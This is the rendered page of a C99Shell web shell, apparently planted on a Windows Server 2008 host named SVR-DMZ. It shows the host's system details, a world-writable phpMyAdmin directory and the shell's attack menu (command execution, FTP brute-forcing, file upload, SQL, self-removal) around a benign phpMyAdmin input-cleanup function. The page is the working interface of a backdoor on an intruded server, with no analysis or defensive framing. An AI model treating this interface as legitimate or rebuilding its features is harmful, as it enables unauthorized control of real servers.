!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\phpMyAdmin\libraries\   drwxrwxrwx
Free 4.1 GB of 39.52 GB (10.37%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     cleanup.lib.php (1.43 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * Functions for cleanup of user input.
 *
 * @version $Id: cleanup.lib.php 10723 2007-10-05 09:46:30Z cybot_tm $
 */

/**
 * Removes all variables from request except whitelisted ones.
 *
 * @param string list of variables to allow
 * @return nothing
 * @access public
 * @author  Michal Cihar (michal@cihar.com)
 */
function PMA_remove_request_vars(&$whitelist)
{
    
// do not check only $_REQUEST because it could have been overwritten
    // and use type casting because the variables could have become
    // strings
    
$keys array_keys(array_merge((array)$_REQUEST, (array)$_GET, (array)$_POST, (array)$_COOKIE));

    foreach(
$keys as $key) {
        if (! 
in_array($key$whitelist)) {
            unset(
$_REQUEST[$key], $_GET[$key], $_POST[$key], $GLOBALS[$key]);
        } else {
            
// allowed stuff could be compromised so escape it
            // we require it to be a string
            
if (isset($_REQUEST[$key]) && ! is_string($_REQUEST[$key])) {
                unset(
$_REQUEST[$key]);
            }
            if (isset(
$_POST[$key]) && ! is_string($_POST[$key])) {
                unset(
$_POST[$key]);
            }
            if (isset(
$_COOKIE[$key]) && ! is_string($_COOKIE[$key])) {
                unset(
$_COOKIE[$key]);
            }
            if (isset(
$_GET[$key]) && ! is_string($_GET[$key])) {
                unset(
$_GET[$key]);
            }
        }
    }
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.078 ]--